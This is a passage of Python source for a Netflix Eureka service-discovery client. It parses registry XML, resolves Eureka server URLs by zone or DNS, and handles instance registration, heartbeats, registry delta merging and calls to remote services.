applications.add_application(_build_application(child_node))
return applications
def _build_application(xml_node):
if xml_node.tag != "application":
return None
application = Application()
for child_node in xml_node:
if child_node.tag == "name":
application.name = child_node.text
elif child_node.tag == "instance":
application.add_instance(_build_instance(child_node))
return application
def _build_instance(xml_node):
if xml_node.tag != "instance":
return None
instance = Instance()
for child_node in xml_node:
if child_node.tag == "instanceId":
instance.instanceId = child_node.text
elif child_node.tag == "sid":
instance.sid = child_node.text
elif child_node.tag == "app":
instance.app = child_node.text
elif child_node.tag == "appGroupName":
instance.appGroupName = child_node.text
elif child_node.tag == "ipAddr":
instance.ipAddr = child_node.text
elif child_node.tag == "port":
instance.port = _build_port(child_node)
elif child_node.tag == "securePort":
instance.securePort = _build_port(child_node)
elif child_node.tag == "homePageUrl":
instance.homePageUrl = child_node.text
elif child_node.tag == "statusPageUrl":
instance.statusPageUrl = child_node.text
elif child_node.tag == "healthCheckUrl":
instance.healthCheckUrl = child_node.text
elif child_node.tag == "secureHealthCheckUrl":
instance.secureHealthCheckUrl = child_node.text
elif child_node.tag == "vipAddress":
instance.vipAddress = child_node.text
elif child_node.tag == "secureVipAddress":
instance.secureVipAddress = child_node.text
elif child_node.tag == "countryId":
instance.countryId = int(child_node.text)
elif child_node.tag == "dataCenterInfo":
instance.dataCenterInfo = _build_data_center_info(child_node)
elif child_node.tag == "hostName":
instance.hostName = child_node.text
elif child_node.tag == "status":
instance.status = child_node.text
elif child_node.tag == "overriddenstatus":
instance.overriddenstatus = child_node.text
elif child_node.tag == "leaseInfo":
instance.leaseInfo = _build_lease_info(child_node)
elif child_node.tag == "isCoordinatingDiscoveryServer":
instance.isCoordinatingDiscoveryServer = (child_node.text == "true")
elif child_node.tag == "metadata":
instance.metadata = _build_metadata(child_node)
elif child_node.tag == "lastUpdatedTimestamp":
instance.lastUpdatedTimestamp = int(child_node.text)
elif child_node.tag == "lastDirtyTimestamp":
instance.lastDirtyTimestamp = int(child_node.text)
elif child_node.tag == "actionType":
instance.actionType = child_node.text
elif child_node.tag == "asgName":
instance.asgName = child_node.text
return instance
def _build_data_center_info(xml_node):
class_name = xml_node.attrib["class"]
name = ""
metadata = {}
for child_node in xml_node:
if child_node.tag == "name":
name = child_node.text
elif child_node.tag == "metadata":
metadata = _build_metadata(child_node)
return DataCenterInfo(name=name, className=class_name, metadata=metadata)
def _build_metadata(xml_node):
metadata = {}
for child_node in list(xml_node):
metadata[child_node.tag] = child_node.text
return metadata
def _build_lease_info(xml_node):
leaseInfo = LeaseInfo()
for child_node in list(xml_node):
if child_node.tag == "renewalIntervalInSecs":
leaseInfo.renewalIntervalInSecs = int(child_node.text)
elif child_node.tag == "durationInSecs":
leaseInfo.durationInSecs = int(child_node.text)
elif child_node.tag == "registrationTimestamp":
leaseInfo.registrationTimestamp = int(child_node.text)
elif child_node.tag == "lastRenewalTimestamp":
leaseInfo.lastRenewalTimestamp = int(child_node.text)
elif child_node.tag == "renewalTimestamp":
leaseInfo.renewalTimestamp = int(child_node.text)
elif child_node.tag == "evictionTimestamp":
leaseInfo.evictionTimestamp = int(child_node.text)
elif child_node.tag == "serviceUpTimestamp":
leaseInfo.serviceUpTimestamp = int(child_node.text)
return leaseInfo
def _build_port(xml_node):
port = PortWrapper()
port.port = int(xml_node.text)
port.enabled = (xml_node.attrib["enabled"] == "true")
return port
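# The _build_* helpers above walk the XML documents returned by the Eureka REST
# API. A trimmed, illustrative example of the shape they expect (not a complete
# or real server response):
#
#   <applications>
#     <versions__delta>1</versions__delta>
#     <apps__hashcode>UP_1_</apps__hashcode>
#     <application>
#       <name>MY-SERVICE</name>
#       <instance>
#         <instanceId>192.168.1.5:my-service:9090</instanceId>
#         <app>MY-SERVICE</app>
#         <ipAddr>192.168.1.5</ipAddr>
#         <port enabled="true">9090</port>
#         <securePort enabled="false">9443</securePort>
#         <status>UP</status>
#       </instance>
#     </application>
#   </applications>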
def get_delta(eureka_server: str, regions: List[str] = []) -> Applications:
return _get_applications_(f"{_format_url(eureka_server)}apps/delta", regions)
def get_vip(eureka_server: str, vip: str, regions: List[str] = []) -> Applications:
return _get_applications_(f"{_format_url(eureka_server)}vips/{vip}", regions)
def get_secure_vip(eureka_server: str, svip: str, regions: List[str] = []) -> Applications:
return _get_applications_(f"{_format_url(eureka_server)}svips/{svip}", regions)
def get_application(eureka_server: str, app_name: str) -> Application:
url = f"{_format_url(eureka_server)}apps/{quote(app_name)}"
txt = http_client.load(url, timeout=_DEFAULT_TIME_OUT)[0]
return _build_application(ElementTree.fromstring(txt))
def get_app_instance(eureka_server: str, app_name: str, instance_id: str) -> Instance:
return _get_instance_(f"{_format_url(eureka_server)}apps/{quote(app_name)}/{quote(instance_id)}")
def get_instance(eureka_server: str, instance_id: str) -> Instance:
return _get_instance_(f"{_format_url(eureka_server)}instances/{quote(instance_id)}")
def _get_instance_(url):
txt = http_client.load(url, timeout=_DEFAULT_TIME_OUT)[0]
return _build_instance(ElementTree.fromstring(txt))
def _current_time_millis():
return int(time.time() * 1000)
"""====================== Client ======================================="""
class EurekaServerConf(object):
def __init__(self,
eureka_server=_DEFAULT_EUREKA_SERVER_URL,
eureka_domain="",
eureka_protocol="http",
eureka_basic_auth_user="",
eureka_basic_auth_password="",
eureka_context="eureka/v2",
eureka_availability_zones={},
region="",
zone=""):
self.__servers = {}
self.region: str = region
self.__zone = zone
self.__eureka_availability_zones = eureka_availability_zones
_zone = zone if zone else _DEFAUTL_ZONE
if eureka_domain:
zone_urls = get_txt_dns_record(f"txt.{region}.{eureka_domain}")
for zone_url in zone_urls:
zone_name = zone_url.split(".")[0]
eureka_urls = get_txt_dns_record(f"txt.{zone_url}")
self.__servers[zone_name] = [self._format_url(eureka_url.strip(), eureka_protocol, eureka_basic_auth_user,
eureka_basic_auth_password, eureka_context) for eureka_url in eureka_urls]
elif eureka_availability_zones:
for zone_name, v in eureka_availability_zones.items():
if isinstance(v, list):
eureka_urls = v
else:
eureka_urls = str(v).split(",")
self.__servers[zone_name] = [self._format_url(eureka_url.strip(), eureka_protocol, eureka_basic_auth_user,
eureka_basic_auth_password, eureka_context) for eureka_url in eureka_urls]
else:
self.__servers[_zone] = [self._format_url(eureka_url.strip(), eureka_protocol, eureka_basic_auth_user,
eureka_basic_auth_password, eureka_context) for eureka_url in eureka_server.split(",")]
self.__servers_not_in_zone = copy(self.__servers)
if _zone in self.__servers_not_in_zone:
del self.__servers_not_in_zone[_zone]
@property
def zone(self) -> str:
if self.__zone:
return self.__zone
elif self.__eureka_availability_zones:
return list(self.__eureka_availability_zones.keys())[0]
else:
return _DEFAUTL_ZONE
def _format_url(self, server_url="",
eureka_protocol="http",
eureka_basic_auth_user="",
eureka_basic_auth_password="",
eureka_context="eureka/v2"):
url = server_url
if url.endswith('/'):
url = url[0: -1]
if url.find("://") > 0:
prtl, url = tuple(url.split("://"))
else:
prtl = eureka_protocol
if url.find("@") > 0:
basic_auth, url = tuple(url.split("@"))
if basic_auth.find(":") > 0:
user, password = tuple(basic_auth.split(":"))
else:
user = basic_auth
password = ""
else:
user = quote(eureka_basic_auth_user)
password = quote(eureka_basic_auth_password)
basic_auth = ""
if user:
if password:
basic_auth = f"{user}:{password}"
else:
basic_auth = user
basic_auth += "@"
if url.find("/") > 0:
ctx = ""
else:
ctx = eureka_context if eureka_context.startswith('/') else "/" + eureka_context
return f"{prtl}://{basic_auth}{url}{ctx}"
@property
def servers(self) -> Dict:
return self.__servers
@property
def servers_in_zone(self) -> List[str]:
if self.zone in self.servers:
return self.servers[self.zone]
else:
return []
@property
def servers_not_in_zone(self) -> List[str]:
return self.__servers_not_in_zone
class EurekaServerConnectionException(http_client.URLError):
pass
class DiscoverException(http_client.URLError):
pass
class EurekaClient:
"""
Example:
>>> client = EurekaClient(
eureka_server="http://my_eureka_server_peer_1/eureka/v2,http://my_eureka_server_peer_2/eureka/v2",
app_name="python_module_1",
instance_port=9090)
>>> client.start()
>>> result = client.do_service("APP_NAME", "/context/path", return_type="json")
EIPs support:
You can configure EIPs using `eureka_availability_zones` and specify the `zone` of your instance. But please be aware that the client will not fill in the metadata automatically;
you should put it into the `metadata` when creating the object.
>>> client = EurekaClient(eureka_availability_zones={
"us-east-1c": "http://ec2-552-627-568-165.compute-1.amazonaws.com:7001/eureka/v2/,http://ec2-368-101-182-134.compute-1.amazonaws.com:7001/eureka/v2/",
"us-east-1d": "http://ec2-552-627-568-170.compute-1.amazonaws.com:7001/eureka/v2/",
"us-east-1e": "http://ec2-500-179-285-592.compute-1.amazonaws.com:7001/eureka/v2/"},
zone="us-east-1c",
app_name="python_module_1",
instance_port=9090,
data_center_name="Amazon")
EurekaClient supports DNS discovery feature.
For instance, the following is a DNS TXT record created in the DNS server that lists the set of available DNS names for a zone.
>>> txt.us-east-1.mydomaintest.netflix.net="us-east-1c.mydomaintest.netflix.net" "us-east-1d.mydomaintest.netflix.net" "us-east-1e.mydomaintest.netflix.net"
Then, you can define TXT records recursively for each zone similar to the following (if there is more than one hostname per zone, space-delimit them)
>>> txt.us-east-1c.mydomaintest.netflix.net="ec2-552-627-568-165.compute-1.amazonaws.com" "ec2-368-101-182-134.compute-1.amazonaws.com"
>>> txt.us-east-1d.mydomaintest.netflix.net="ec2-552-627-568-170.compute-1.amazonaws.com"
>>> txt.us-east-1e.mydomaintest.netflix.net="ec2-500-179-285-592.compute-1.amazonaws.com"
And then you can create the client like:
>>> client = EurekaClient(eureka_domain="mydomaintest.netflix.net",
region="us-east-1",
zone="us-east-1c",
app_name="python_module_1",
instance_port=9090,
data_center_name="Amazon")
Eureka client also supports setting up the protocol, basic authentication and context path of your eureka server.
>>> client = EurekaClient(eureka_domain="mydomaintest.netflix.net",
region="us-east-1",
zone="us-east-1c",
eureka_protocol="https",
eureka_basic_auth_user="keijack",
eureka_basic_auth_password="kjauthpass",
eureka_context="/eureka/v2",
app_name="python_module_1",
instance_port=9090,
data_center_name="Amazon")
or
>>> client = EurekaClient(eureka_server="my_eureka_server_peer_1,my_eureka_server_peer_2",
eureka_protocol="https",
eureka_basic_auth_user="keijack",
eureka_basic_auth_password="kjauthpass",
eureka_context="/eureka/v2",
app_name="python_module_1",
instance_port=9090)
You can use `do_service`, `do_service_async`, `walk_nodes`, `walk_nodes_async` to call the remote services.
>>> res = eureka_client.do_service("OTHER-SERVICE-NAME", "/service/context/path")
>>> def success_callback(data):
...
def error_callback(error):
...
client.do_service_async("OTHER-SERVICE-NAME", "/service/context/path", on_success=success_callback, on_error=error_callback)
>>> def walk_using_your_own_urllib(url):
...
res = client.walk_nodes("OTHER-SERVICE-NAME", "/service/context/path", walker=walk_using_your_own_urllib)
>>> client.walk_nodes("OTHER-SERVICE-NAME", "/service/context/path",
walker=walk_using_your_own_urllib,
on_success=success_callback,
on_error=error_callback)
Attributes:
* eureka_server: The eureka server url. If you have deployed a cluster for failover, use `,` to separate the urls.
* eureka_domain: The domain name when using the DNS discovery.
* region: The region when using DNS discovery.
* zone: Which zone your instances belong to, default is `default`.
* eureka_availability_zones: The zones' url configurations.
* eureka_protocol: The protocol of the eureka server; if the url already includes this part, it will not be added again.
* eureka_basic_auth_user: User name for basic authentication against the eureka server; if the url already includes this part, it will not be added again.
* eureka_basic_auth_password: Password for basic authentication against the eureka server; if the url already includes this part, it will not be added again.
* eureka_context: The context path of the eureka server; if the url already includes this part, it will not be added again. Default is `/eureka`,
which matches the spring-boot eureka context but not the Netflix eureka server url.
* prefer_same_zone: When set to True, the client will first try the eureka servers in its own zone for registration and prefer instances in the
same zone when calling services; otherwise eureka servers and instances are chosen randomly. Default is `True`.
* should_register: When set to False, will not register this instance to the eureka server, default is `True`.
* should_discover: When set to False, will not pull registry from the eureka server, default is `True`.
The following parameters all the properties of this instances, all this fields will be sent to the eureka server.
* app_name: The application name of this instance.
* instance_id: The id of this instance; if not specified, one is generated from the instance ip, app_name and instance_port.
* instance_host: The host of this instance.
* instance_ip: The ip of this instance. If instance_host and instance_ip are not specified, will try to find the ip via a connection to the eureka server.
* instance_ip_network: The ip network of this instance. If instance_host and instance_ip are not specified, will try to find the ip from the available network adapters that match the specified network, for example 192.168.1.0/24.
* instance_port: The port of this instance.
* instance_unsecure_port_enabled: Set whether enable the instance's unsecure port, default is `True`.
* instance_secure_port: The secure port of this instance.
* instance_secure_port_enabled: Set whether enable the instance's secure port, default is `False`.
* data_center_name: Accept `Netflix`, `Amazon`, `MyOwn`, default is `MyOwn`
* renewal_interval_in_secs: The interval at which heartbeats are sent and the registry is pulled, default is 30 seconds.
* duration_in_secs: Sets the client specified setting for eviction (e.g. how long to wait without renewal event).
* home_page_url: The home page url of this instance.
* status_page_url: The status page url of this instance.
* health_check_url: The health check url of this instance.
* secure_health_check_url: The secure health check url of this instance.
* vip_adr: The virtual ip address of this instance.
* secure_vip_addr: The secure virtual ip address of this instance.
* is_coordinating_discovery_server: Sets a flag if this instance is the same as the discovery server that is
returning the instances. This flag is used by the discovery clients to
identify the discovery server which is coordinating/returning the
information.
* metadata: The metadata map of this instance.
* remote_regions: Will also find the services that belong to these regions.
* ha_strategy: Specifies the strategy used to choose an instance when there is more than one instance of an app.
"""
def __init__(self,
eureka_server: str = _DEFAULT_EUREKA_SERVER_URL,
eureka_domain: str = "",
region: str = "",
zone: str = "",
eureka_availability_zones: Dict[str, str] = {},
eureka_protocol: str = "http",
eureka_basic_auth_user: str = "",
eureka_basic_auth_password: str = "",
eureka_context: str = "/eureka",
prefer_same_zone: bool = True,
should_register: bool = True,
should_discover: bool = True,
on_error: Callable = None,
app_name: str = "",
instance_id: str = "",
instance_host: str = "",
instance_ip: str = "",
instance_ip_network: str = "",
instance_port: int = _DEFAULT_INSTNACE_PORT,
instance_unsecure_port_enabled: bool = True,
instance_secure_port: int = _DEFAULT_INSTNACE_SECURE_PORT,
instance_secure_port_enabled: bool = False,
data_center_name: str = _DEFAULT_DATA_CENTER_INFO, # Netflix, Amazon, MyOwn
renewal_interval_in_secs: int = _RENEWAL_INTERVAL_IN_SECS,
duration_in_secs: int = _DURATION_IN_SECS,
home_page_url: str = "",
status_page_url: str = "",
health_check_url: str = "",
secure_health_check_url: str = "",
vip_adr: str = "",
secure_vip_addr: str = "",
is_coordinating_discovery_server: bool = False,
metadata: Dict = {},
remote_regions: List[str] = [],
ha_strategy: int = HA_STRATEGY_RANDOM):
assert app_name is not None and app_name != "" if should_register else True, "application name must be specified."
assert instance_port > 0 if should_register else True, "port is invalid"
assert isinstance(metadata, dict), "metadata must be dict"
assert ha_strategy in (HA_STRATEGY_RANDOM, HA_STRATEGY_STICK,
HA_STRATEGY_OTHER) if should_discover else True, f"do not support strategy {ha_strategy}"
self.__net_lock = RLock()
self.__eureka_server_conf = EurekaServerConf(
eureka_server=eureka_server,
eureka_domain=eureka_domain,
eureka_protocol=eureka_protocol,
eureka_basic_auth_user=eureka_basic_auth_user,
eureka_basic_auth_password=eureka_basic_auth_password,
eureka_context=eureka_context,
eureka_availability_zones=eureka_availability_zones,
region=region,
zone=zone
)
self.__cache_eureka_url = {}
self.__should_register = should_register
self.__should_discover = should_discover
self.__prefer_same_zone = prefer_same_zone
self.__alive = False
self.__heartbeat_interval = renewal_interval_in_secs
self.__heartbeat_timer = Timer(renewal_interval_in_secs, self.__heartbeat)
self.__heartbeat_timer.daemon = True
self.__instance_ip = instance_ip
self.__instance_ip_network = instance_ip_network
self.__instance_host = instance_host
self.__aws_metadata = {}
self.__on_error_callback = on_error
# For registry
if should_register:
if data_center_name == "Amazon":
self.__aws_metadata = self.__load_ec2_metadata_dict()
if self.__instance_host == "" and self.__instance_ip == "":
self.__instance_ip, self.__instance_host = self.__get_ip_host(self.__instance_ip_network)
elif self.__instance_host != "" and self.__instance_ip == "":
self.__instance_ip = netint.get_ip_by_host(self.__instance_host)
if not EurekaClient.__is_ip(self.__instance_ip):
def try_to_get_client_ip(url):
self.__instance_ip = EurekaClient.__get_instance_ip(url)
self.__connect_to_eureka_server(try_to_get_client_ip)
elif self.__instance_host == "" and self.__instance_ip != "":
self.__instance_host = netint.get_host_by_ip(self.__instance_ip)
mdata = {
'management.port': str(instance_port)
}
if zone:
mdata["zone"] = zone
mdata.update(metadata)
ins_id = instance_id if instance_id != "" else f"{self.__instance_ip}:{app_name.lower()}:{instance_port}"
_logger.debug(f"register instance using id [#{ins_id}]")
self.__instance = {
'instanceId': ins_id,
'hostName': self.__instance_host,
'app': app_name.upper(),
'ipAddr': self.__instance_ip,
'port': {
'$': instance_port,
'@enabled': str(instance_unsecure_port_enabled).lower()
},
'securePort': {
'$': instance_secure_port,
'@enabled': str(instance_secure_port_enabled).lower()
},
'countryId': 1,
'dataCenterInfo': {
'@class': _AMAZON_DATA_CENTER_INFO_CLASS if data_center_name == "Amazon" else _DEFAULT_DATA_CENTER_INFO_CLASS,
'name': data_center_name
},
'leaseInfo': {
'renewalIntervalInSecs': renewal_interval_in_secs,
'durationInSecs': duration_in_secs,
'registrationTimestamp': 0,
'lastRenewalTimestamp': 0,
'evictionTimestamp': 0,
'serviceUpTimestamp': 0
},
'metadata': mdata,
'homePageUrl': EurekaClient.__format_url(home_page_url, self.__instance_host, instance_port),
'statusPageUrl': EurekaClient.__format_url(status_page_url, self.__instance_host, instance_port, "info"),
'healthCheckUrl': EurekaClient.__format_url(health_check_url, self.__instance_host, instance_port, "health"),
'secureHealthCheckUrl': secure_health_check_url,
'vipAddress': vip_adr if vip_adr != "" else app_name.lower(),
'secureVipAddress': secure_vip_addr if secure_vip_addr != "" else app_name.lower(),
'isCoordinatingDiscoveryServer': str(is_coordinating_discovery_server).lower()
}
if data_center_name == "Amazon":
self.__instance["dataCenterInfo"]["metadata"] = self.__aws_metadata
else:
self.__instance = {}
# For discovery
self.__remote_regions = remote_regions if remote_regions is not None else []
self.__applications = None
self.__delta = None
self.__ha_strategy = ha_strategy
self.__ha_cache = {}
self.__application_mth_lock = RLock()
def __get_ip_host(self, network):
ip, host = netint.get_ip_and_host(network)
if self.__aws_metadata and "local-ipv4" in self.__aws_metadata and self.__aws_metadata["local-ipv4"]:
ip = self.__aws_metadata["local-ipv4"]
if self.__aws_metadata and "local-hostname" in self.__aws_metadata and self.__aws_metadata["local-hostname"]:
host = self.__aws_metadata["local-hostname"]
return ip, host
def __load_ec2_metadata_dict(self):
# instance metadata
amazon_info = AmazonInfo()
mac = amazon_info.get_ec2_metadata('mac')
if mac:
vpc_id = amazon_info.get_ec2_metadata(f'network/interfaces/macs/{mac}/vpc-id')
else:
vpc_id = ""
metadata = {
'instance-id': amazon_info.get_ec2_metadata('instance-id'),
'ami-id': amazon_info.get_ec2_metadata('ami-id'),
'instance-type': amazon_info.get_ec2_metadata('instance-type'),
'local-ipv4': amazon_info.get_ec2_metadata('local-ipv4'),
'local-hostname': amazon_info.get_ec2_metadata('local-hostname'),
'availability-zone': amazon_info.get_ec2_metadata('placement/availability-zone', ignore_error=True),
'public-hostname': amazon_info.get_ec2_metadata('public-hostname', ignore_error=True),
'public-ipv4': amazon_info.get_ec2_metadata('public-ipv4', ignore_error=True),
'mac': mac,
'vpcId': vpc_id
}
# accountId
doc = amazon_info.get_instance_identity_document()
if doc and "accountId" in doc:
metadata["accountId"] = doc["accountId"]
return metadata
@property
def should_register(self) -> bool:
return self.__should_register
@property
def should_discover(self) -> bool:
return self.__should_discover
@property
def zone(self) -> str:
return self.__eureka_server_conf.zone
@property
def applications(self) -> Applications:
if not self.should_discover:
raise DiscoverException("should_discover set to False, no registry is pulled, cannot find any applications.")
with self.__application_mth_lock:
if self.__applications is None:
self.__pull_full_registry()
return self.__applications
def __try_eureka_server_in_cache(self, fun):
ok = False
invalid_keys = []
for z, url in self.__cache_eureka_url.items():
try:
_logger.debug(f"Try to do {fun.__name__} in zone[{z}] using cached url {url}. ")
fun(url)
except (http_client.HTTPError, http_client.URLError):
_logger.warn(f"Eureka server [{url}] is down, use next url to try.", exc_info=True)
invalid_keys.append(z)
else:
ok = True
if invalid_keys:
_logger.debug(f"Invalid keys::{invalid_keys} will be removed from cache.")
for z in invalid_keys:
del self.__cache_eureka_url[z]
if not ok:
raise EurekaServerConnectionException("All eureka servers in cache are down!")
def __try_eureka_server_in_zone(self, fun):
self.__try_eureka_servers_in_list(fun, self.__eureka_server_conf.servers_in_zone, self.zone)
def __try_eureka_server_not_in_zone(self, fun):
for zone, urls in self.__eureka_server_conf.servers_not_in_zone.items():
try:
self.__try_eureka_servers_in_list(fun, urls, zone)
except EurekaServerConnectionException:
_logger.warn(f"try eureka servers in zone[{zone}] error!", exc_info=True)
else:
return
raise EurekaServerConnectionException("All eureka servers in all zone are down!")
def __try_eureka_server_regardless_zones(self, fun):
for zone, urls in self.__eureka_server_conf.servers.items():
try:
self.__try_eureka_servers_in_list(fun, urls, zone)
except EurekaServerConnectionException:
_logger.warn(f"try eureka servers in zone[{zone}] error!", exc_info=True)
else:
return
raise EurekaServerConnectionException("All eureka servers in all zone are down!")
def __try_all_eureka_servers(self, fun):
if self.__prefer_same_zone:
try:
self.__try_eureka_server_in_zone(fun)
except EurekaServerConnectionException:
self.__try_eureka_server_not_in_zone(fun)
else:
self.__try_eureka_server_regardless_zones(fun)
def __try_eureka_servers_in_list(self, fun, eureka_servers=[], zone=_DEFAUTL_ZONE):
with self.__net_lock:
ok = False
_zone = zone if zone else _DEFAUTL_ZONE
for url in eureka_servers:
url = url.strip()
try:
_logger.debug(f"try to do {fun.__name__} in zone[{_zone}] using url {url}. ")
fun(url)
except (http_client.HTTPError, http_client.URLError):
_logger.warn(f"Eureka server [{url}] is down, use next url to try.", exc_info=True)
else:
ok = True
self.__cache_eureka_url[_zone] = url
break
if not ok:
if _zone in self.__cache_eureka_url:
del self.__cache_eureka_url[_zone]
raise EurekaServerConnectionException(f"All eureka servers in zone[{_zone}] are down!")
def __connect_to_eureka_server(self, fun):
if self.__cache_eureka_url:
try:
self.__try_eureka_server_in_cache(fun)
except EurekaServerConnectionException:
self.__try_all_eureka_servers(fun)
else:
self.__try_all_eureka_servers(fun)
@staticmethod
def __format_url(url, host, port, default_ctx=""):
if url != "":
if url.startswith('http'):
_url = url
elif url.startswith('/'):
_url = f'http://{host}:{port}{url}'
else:
_url = f'http://{host}:{port}/{url}'
else:
_url = f'http://{host}:{port}/{default_ctx}'
return _url
@staticmethod
def __is_ip(ip_str):
return re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', ip_str)
@staticmethod
def __get_instance_ip(eureka_server):
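# Note on the approach below: "connecting" a UDP socket to the eureka server
# sends no traffic, but it makes the OS choose the local address that would be
# used to reach that host, which getsockname() then reports. That local address
# is used as this instance's ip when none was configured explicitly.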
url_obj = http_client.parse_url(eureka_server)
target_ip = url_obj["host"]
target_port = url_obj["port"]
if target_port is None:
if url_obj["schema"] == "http":
target_port = 80
else:
target_port = 443
if url_obj["ipv6"] is not None:
target_ip = url_obj["ipv6"]
socket_family = socket.AF_INET6
else:
socket_family = socket.AF_INET
s = socket.socket(socket_family, socket.SOCK_DGRAM)
s.connect((target_ip, target_port))
ip = s.getsockname()[0]
s.close()
return ip
def _on_error(self, error_type: str, exception: Exception):
if self.__on_error_callback and callable(self.__on_error_callback):
self.__on_error_callback(error_type, exception)
def register(self, status: str = INSTANCE_STATUS_UP, overriddenstatus: str = INSTANCE_STATUS_UNKNOWN) -> None:
self.__instance["status"] = status
self.__instance["overriddenstatus"] = overriddenstatus
self.__instance["lastUpdatedTimestamp"] = str(_current_time_millis())
self.__instance["lastDirtyTimestamp"] = str(_current_time_millis())
try:
def do_register(url):
_register(url, self.__instance)
self.__connect_to_eureka_server(do_register)
except Exception as e:
self.__alive = False
_logger.warn("Register error! Will try in next heartbeat. ", exc_info=True)
self._on_error(ERROR_REGISTER, e)
else:
_logger.debug("register successfully!")
self.__alive = True
def cancel(self) -> None:
try:
def do_cancel(url):
cancel(url, self.__instance["app"], self.__instance["instanceId"])
self.__connect_to_eureka_server(do_cancel)
except Exception as e:
_logger.warn("Cancel error!", exc_info=True)
self._on_error(ERROR_STATUS_UPDATE, e)
else:
self.__alive = False
def send_heartbeat(self, overridden_status: str = "") -> None:
if not self.__alive:
self.register()
return
try:
_logger.debug("sending heartbeat to eureka server. ")
def do_send_heartbeat(url):
send_heartbeat(url, self.__instance["app"],
self.__instance["instanceId"], self.__instance["lastDirtyTimestamp"],
status=self.__instance["status"], overriddenstatus=overridden_status)
self.__connect_to_eureka_server(do_send_heartbeat)
except Exception as e:
_logger.warn("Cannot send heartbeat to server, try to register. ", exc_info=True)
self._on_error(ERROR_STATUS_UPDATE, e)
self.register()
def status_update(self, new_status: str) -> None:
self.__instance["status"] = new_status
try:
def do_status_update(url):
status_update(url, self.__instance["app"], self.__instance["instanceId"],
self.__instance["lastDirtyTimestamp"], new_status)
self.__connect_to_eureka_server(do_status_update)
except Exception as e:
_logger.warn("update status error!", exc_info=True)
self._on_error(ERROR_STATUS_UPDATE, e)
def delete_status_override(self) -> None:
try:
self.__connect_to_eureka_server(lambda url: delete_status_override(
url, self.__instance["app"], self.__instance["instanceId"], self.__instance["lastDirtyTimestamp"]))
except Exception as e:
_logger.warn("delete status overrid error!", exc_info=True)
self._on_error(ERROR_STATUS_UPDATE, e)
def __start_register(self):
_logger.debug("start to registry client...")
self.register()
def __stop_registry(self):
if self.__alive:
self.register(status=INSTANCE_STATUS_DOWN)
self.cancel()
def __heartbeat(self):
while True:
if self.__should_register:
_logger.debug("sending heartbeat to eureka server ")
self.send_heartbeat()
if self.__should_discover:
_logger.debug("loading services from eureka server")
self.__fetch_delta()
time.sleep(self.__heartbeat_interval)
def __pull_full_registry(self):
def do_pull(url):  # pull the full registry and replace the local cache
self.__applications = get_applications(url, self.__remote_regions)
self.__delta = self.__applications
try:
self.__connect_to_eureka_server(do_pull)
except Exception as e:
_logger.warn("pull full registry from eureka server error!", exc_info=True)
self._on_error(ERROR_DISCOVER, e)
def __fetch_delta(self):
def do_fetch(url):
if self.__applications is None or len(self.__applications.applications) == 0:
self.__pull_full_registry()
return
delta = get_delta(url, self.__remote_regions)
_logger.debug(f"delta got: v.{delta.versionsDelta}::{delta.appsHashcode}")
if self.__delta is not None \
and delta.versionsDelta == self.__delta.versionsDelta \
and delta.appsHashcode == self.__delta.appsHashcode:
return
self.__merge_delta(delta)
self.__delta = delta
if not self.__is_hash_match():
self.__pull_full_registry()
try:
self.__connect_to_eureka_server(do_fetch)
except Exception as e:
_logger.warn("fetch delta from eureka server error!", exc_info=True)
self._on_error(ERROR_DISCOVER, e)
def __is_hash_match(self):
app_hash = self.__get_applications_hash()
_logger.debug(f"check hash, local[{app_hash}], remote[{self.__delta.appsHashcode}]")
return app_hash == self.__delta.appsHashcode
def __merge_delta(self, delta):
_logger.debug(f"merge delta...length of application got from delta::{len(delta.applications)}")
for application in delta.applications:
for instance in application.instances:
_logger.debug(f"instance [{instance.instanceId}] has {instance.actionType}")
if instance.actionType in (ACTION_TYPE_ADDED, ACTION_TYPE_MODIFIED):
existingApp = self.applications.get_application(application.name)
if existingApp is None:
self.applications.add_application(application)
else:
existingApp.update_instance(instance)
elif instance.actionType == ACTION_TYPE_DELETED:
existingApp = self.applications.get_application(application.name)
if existingApp is None:
self.applications.add_application(application)
else:
existingApp.remove_instance(instance)
def __get_applications_hash(self):
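# Reproduces the "apps hashcode" format advertised by the server: a
# concatenation of "{STATUS}_{count}_" pairs sorted by status name, e.g.
# "DOWN_1_UP_3_" for one DOWN and three UP instances (example value only).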
app_hash = ""
app_status_count = {}
for application in self.__applications.applications:
for instance in application.instances:
status = instance.status.upper()
if status not in app_status_count:
app_status_count[status] = 0
app_status_count[status] += 1
sorted_app_status_count = sorted(app_status_count.items(), key=lambda item: item[0])
for item in sorted_app_status_count:
app_hash = f"{app_hash}{item[0]}_{item[1]}_"
return app_hash
def walk_nodes_async(self,
app_name: str = "",
service: str = "",
prefer_ip: bool = False,
prefer_https: bool = False,
walker: Callable = None,
on_success: Callable = None,
on_error: Callable = None) -> None:
def async_thread_target():
try:
res = self.walk_nodes(app_name=app_name, service=service, prefer_ip=prefer_ip, prefer_https=prefer_https, walker=walker)
if on_success is not None and (inspect.isfunction(on_success) or inspect.ismethod(on_success)):
on_success(res)
except http_client.HTTPError as e:
if on_error is not None and (inspect.isfunction(on_error) or inspect.ismethod(on_error)):
on_error(e)
async_thread = Thread(target=async_thread_target)
async_thread.daemon = True
async_thread.start()
def walk_nodes(self,
app_name: str = "",
service: str = "",
prefer_ip: bool = False,
prefer_https: bool = False,
walker: Callable = None) -> Union[str, Dict, http_client.HTTPResponse]:
assert app_name is not None and app_name != "", "application_name should not be null"
assert inspect.isfunction(walker) or inspect.ismethod(walker), "walker must be a method or function"
error_nodes = []
app_name = app_name.upper()
node = self.__get_available_service(app_name)
while node is not None:
try:
url = self.__generate_service_url(node, prefer_ip, prefer_https)
if service.startswith("/"):
url = url + service[1:]
else:
url = url + service
_logger.debug("do service with url::" + url)
return walker(url)
except (http_client.HTTPError, http_client.URLError):
_logger.warn(f"do service {service} in node [{node.instanceId}] error, use next node.")
error_nodes.append(node.instanceId)
node = self.__get_available_service(app_name, error_nodes)
raise http_client.URLError("Try all up instances in registry, but all fail")
def do_service_async(self, app_name: str = "", service: str = "", return_type: str = "string",
prefer_ip: bool = False, prefer_https: bool = False,
on_success: Callable = None, on_error: Callable = None,
method: str = "GET", headers: Dict[str, str] = None,
data: Union[bytes, str, Dict] = None, timeout: float = _DEFAULT_TIME_OUT,
cafile: str = None, capath: str = None, cadefault: bool = False, context: ssl.SSLContext = None) -> None:
def async_thread_target():
try:
res = self.do_service(app_name=app_name,
service=service, return_type=return_type,
prefer_ip=prefer_ip, prefer_https=prefer_https,
method=method, headers=headers,
data=data, timeout=timeout,
cafile=cafile, capath=capath,
